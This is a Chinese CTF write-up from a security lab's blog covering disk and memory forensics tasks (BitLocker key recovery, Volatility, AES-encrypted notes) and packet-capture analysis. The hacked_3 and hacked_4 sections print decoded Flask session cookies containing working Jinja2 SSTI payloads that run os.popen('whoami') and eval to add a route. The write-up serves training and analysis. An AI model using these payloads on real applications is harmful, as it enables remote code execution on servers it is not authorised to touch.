古语有云:“学如逆水行舟,不进则退。”面对如今随时都在变化的网络安全环境更是如此。为此,创信华通微信公众号特开设“创安实验室专栏”,以记录创信华通创安实验室在技术上的探索,加强同行间的交流,相互学习,共同进步。
✦+
+
BF
baby_forensics_1
给了两个文件,一个磁盘镜像,另一个猜测是内存镜像, DiskGenius 打开 .vmdk
发现是BitLocker加密的磁盘,但是给了内存镜像,直接尝试 EFDD 提取恢复密钥,先使用 ArsenalImageMounter 将BitLocker加密磁盘挂载起来。
然后EFDD操作如下:
成功获取恢复密钥:
560604-255013-655633-128854-663223-316063-484946-476498
输入恢复密钥:
打开得到 key.txt
最扯的来了,虽然知道后觉得确实有点像 rot47 ,但是还是觉得很脑洞……
the key is 2e80307085fd2b5c49c968c323ee25d5
或者 R-studio 直接梭哈。
baby_forensics_2
直接将 calc.exe 的内存映射导出来。
然后将 2844.dmp 修改后缀为GIMP可加载的 .data 格式,使用GIMP打开,然后就是不断地调整位移、宽度。先不断调整位移使之有图像的阴影等,然后宽度适当即可,如下:
或者使用这是Volatility3工具的插件命令 windows,用于执行与Windows相关的分析。通过运行此命令,您将获取有关内存转储中运行的Windows进程、模块、文件和注册表等信息。
然后在其中寻找 calc.exe 和PID,找到这个 Windows Handler 的句柄名。
7598632541
baby_forensics_3
pslist 之前一眼便签,肯定有东西,参考我之前的文章:西湖论剑2021中国杭州网络安全技能大赛部分Writeup(https://mochu.blog.csdn.net/article/details/121444273)
直接寻找 .snt 结尾的文件,导出:
替换便签原来的存储位置,然后打开便签,得到密文:
U2FsdGVkX195MCsw0ANs6/Vkjibq89YlmnDdY/dCNKRkixvAP6+B5ImXr2VIqBSp94qfIcjQhDxPgr9G4u++pA==
密钥找了好久,用 R-Studio 翻,最后在 C:/Users/admin/Music 下找到个 i4ak3y
PS:R-Studio 是个神器,好好利用
直接尝试AES解密。
TP
tcpdump_1
当爆破登录失败返回如下:
当请求正确,返回如下:
根据返回特征,直接尝试检索: tcp contains "{"errCode":200}"
TMjpxFGQwD:123457
tcpdump_2
PS C:UsersAdministrator> php -r
"var_dump(md5('accessToken=f412d3a0378d42439ee016b06ef3330c;
zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1'));"
Command line code:1:
string(32) "383c74db4e32513daaa1eeb1726d7255
tcpdump_3
直接过滤关键字:tcp contains "jdbc" and tcp contains "username" and tcp contains "password"
zyplayer:1234567
tcpdump_4
直接检索 jdbc 的payload: tcp contains "jdbc:"
EXP应该是这个: custom.dtd.xml
CVE编号直接将利用的包名和关键字贴上搜索引擎找就行。
CVE-2022-21724:custom.dtd.xml
tcpdump_5
过滤 http ,从后往前追踪TCP流即可发现
fscan
HD
hacked_1
登录有AES加密,密钥、 iv 都已知
接下来只需要找登录成功的用户名和密码。
直接AES解密
flag{WelC0m5_TO_H3re}
hacked_2
直接关键字检索: tcp contains "SECRET"
ssti_flask_hsfvaldb
hacked_3
有 SECRET_KEY ,直接解密JWT即可,找到执行命令的包:
请求包:
PS D:ToolsWebCTFflask-session-cookie-manager> python
.flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c
".eJwdx1EKwyAMANCrDEGiPz1Ar1KGZBi7gBpplH2Idy_d-
3vTDKWrYiGzm2k5vZRUWeo2WsRObkLKeMKeuekoB4RwZvlg1hDg_S917lSeOhAFf0CTRvXp7ytYGPx2EUbnl7drWqqRk11m3cGmKw0.YpIQcw.J5vs8t8bAr0xDIxF6EqUAH2kkLE"
{'username': "{%if session.update({'flag':lipsum['__globals__']['__getitem__']
('os')['popen']('whoami').read()})%}{%endif%}"}
返回包:
PS D:ToolsWebCTFflask-session-cookie-manager> python
.flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c
".eJwdylsKAyEMQNGtFEGiUGYBs5VpkRQz04AvjNIPce-
t_TyXO9QZ8FK7quQfSd1VF6oJI_3S0HzehEQ4p60Xj43MgPXDHrhIjwc4d4X8wiDOwfNPatwoLhrIAvaAkgulxc87Y2SwWyX0xk6r59CUPJ96qvkFHeUvmg.YpIQkg.65xf8l2g9fXAImkfyihId46KkY4"
{'flag': 'redn', 'username': "{%if session.update({'flag':lipsum['__globals__']
['__getitem__']('os')['popen']('whoami').read()})%}{%endif%}"}
答案: red
hacked_4
PS D:ToolsWebCTFflask-session-cookie-manager> python
.flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c
".eJx1jUsOgkAQBa-
Cs2lJCEbdcQI9A0w6DdMaYjPgfAwJmbsLC1fq7r2kKrWo6NlZGlhValmiE7yNrkS8y9iSeMQaENvYS-jt-kDXwC8S0PtG0TSVZAxulovCezhcreEZigw-Q2hoDWUVXFhk3GXH0xnyRhULoONnZB-
wCzP6QN0Dqt_9b1AXsMb_8F10jm3AjdAT0mlNx2uUsY.YpIRHQ.qS_PWmxt4i4cjHYBzDz-rUdTZns"
{'username': '{{url_for.__globals__['__builtins__']['eval']
("app.add_url_rule('/Index', 'Index', lambda :'Hello! 123')",
{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}'}
答案: Index
E·N·D
本文由创信华通创安实验室编辑。
本文仅限于个人学习和技术研究,由于传播、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者本人负责,本单位不为此承担任何责任。创安攻防实验室拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。
如有侵权,请联系后台。
●
创安实验室
创信华通创安实验室,是成都创信华通信息技术有限公司旗下的技术研究团队,成立于2021年9月,主要研究红蓝对抗、重大安全保障、应急响应等方向。
创安攻防实验室圆满完成了多次公安举办的重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
创安攻防实验室秉承创信华通的发展理念,致力打造国内一流网络安全团队。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...